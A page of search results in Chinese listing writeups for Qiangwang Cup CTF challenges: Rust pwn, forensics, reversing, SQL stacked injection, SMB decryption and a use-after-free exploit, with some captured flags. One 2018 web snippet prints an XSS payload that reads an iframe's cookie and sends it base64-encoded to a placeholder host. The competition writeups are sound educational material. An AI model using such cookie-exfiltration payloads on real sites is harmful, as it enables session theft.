
[原创]强网杯S8 Rust Pwn chat-with-me出题思路分享-Pwn-看雪-安 …
2024年11月4日 · 本题在构思的时候其实是想用不含unsafe的rust语言构造一个漏洞,因此一方面在 RustSec 上寻找合适的漏洞,另一方面发现了 cve-rs 项目。 首先在RustSec找的漏洞不太适合出题,又限于出题时间和自身水平,最终还是选择用cve-rs内的原理,“盗用”了. UIUCTF 2024 Rusty Pointer题目的触发POC: 据我的理解,这段POC实际上是利用对变量静态生存周期的混淆,欺骗rust编译器不释放离开生存期的变量。 通过上述的技术原理,我们可以得到一个离开生存期仍 …
GitHub - CTF-Archives/2024-qwbs8: 第八届 “强网杯” 全国网络安全 …
2024年11月3日 · 饥渴C猫是一个刚刚入职的员工,但是最近他发现自己的电脑变得越来越奇怪。 可能由于是之前他接受的一封奇怪的邮件,于是饥渴C猫找到了你,他希望你作为取证-应急响应大师可以帮忙。 你可以完成调查到底发生了什么并且填写相关的调查报告。 Hint: 第六问指得是解密完载荷后可以看到一个s******s的函数 (*不代表正确长度) 然后你需要去提交该函数的参数,这个参数是需要解字符串混淆后的一段字符串 并且将这段字符放到cyberchef MD5一下. Hint: 第12问的最 …
强网杯2024 Writeup - 星盟安全团队
2024年11月4日 · 功能有6个,功能1 输入数据到global->memory[mem_idx],并对数据跟输入的一个char数据进行与运算,与运算调用了函数. 功能2依次输入数据,并与输入的一个int数据进行 …
2024 强网杯 部分题解 - S1uM4i
2025年1月14日 · shellcode 就是简单异或验证输入,但是弄出来的 flag 是错的,问题肯定出在 emu。 常规来说需要 diff,不过 mmap 直接在固定位置分配内存,很诡异,所以直接在 emu …
2024 强网杯逆向 Writeups - gaoyucan - 博客园
2024年11月3日 · 原文使用 hackmd 编写,所以图片均托管在外网,图没挂加载不出来图片自己想办法。 编译一个 qemu-6.2.0 mips-linux-user bindiff 一下恢复符号,怀疑修改了 ELF loader 或者 syscall,最后发现是后者改了 do_syscall1 函数 read 和 write 系统调用实现。 交叉引用找到加密算法. // Created by gaoyucan on 2024/11/2. }; sbox[i] = i; v5 += a + b; sbox[i] = sbox[v5 & 0xff]; sbox[v5 & 0xff] = a; v7 += 1; v8 += a; sbox[v7 & 0xff] = sbox[v8 & 0xff];
强网杯S8初赛Pwn writeup | xia0ji233's blog
2024年11月7日 · 本次强网杯初赛做出两道pwn题,把详细题解写一下记录。
[原题复现]2019强网杯WEB-随便注(多种方法) - 笑花大王 - 博客园
2020年2月6日 · 原题复现: https://gitee.com/xiaohua1998/qwb_2019_supersqli. 考察知识点:SQL注入漏洞-堆叠注入. 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题. 做题过程. 打开页面测试注入点 //
2024 强网杯初赛 Misc方向 部分WriteUp | C3ngH's B10g
可以看到有很多加密后的SMB3流量,可以根据这篇博客 SMB流量分析 了解SMB流量协议的组成,在 Frame 122 中找到 NTLM的Hash,也找到很多RDP流量. 根据这篇文章: https://malwarelab.eu/posts/tryhackme-smb-decryption/#smb-traffic-decryption-with-the-password. …
第二届强网杯Web Writeup - l3m0n - 博客园
2018年3月27日 · 打回来的数据提示 Try to get the cookie of path "/QWB_fl4g/QWB/",也就是要获取不同目录下的cookie。 可以通过iframe来加载,最后来获取iframe里面的cookie。 document. body. appendChild (i); var content = i. contentWindow. document. cookie; location= '//ip/' + btoa (content); 最后可拿到flag: flag=QWB%7Bflag_is_f43kth4rpo%7D; HINT=Try to get the cookie of path "/QWB_fl4g/QWB/"
第八届强网杯-wp - CSDN博客
2024年11月5日 · 该题思路通过分配和释放内存块,利用use-after-free漏 洞泄漏libc地址,计算出libc基地址,修改GOT表中的puts函数地址,实现远程代码执行。 flag {tHanKS_f0R_YoUr_FeeDBAck_seE_y0U_NexT_ye@r!} 发现qwb! 怀疑是flag的一部分. 地图大小是5600 400字符分一个组可以分14个 然后qwb! 占了四个组 下面的白色部分占了一个组 还剩九个组. 加上前面的qwb! 连接到一起得出flag. flag {you_can_weight_it_in_21_steps!}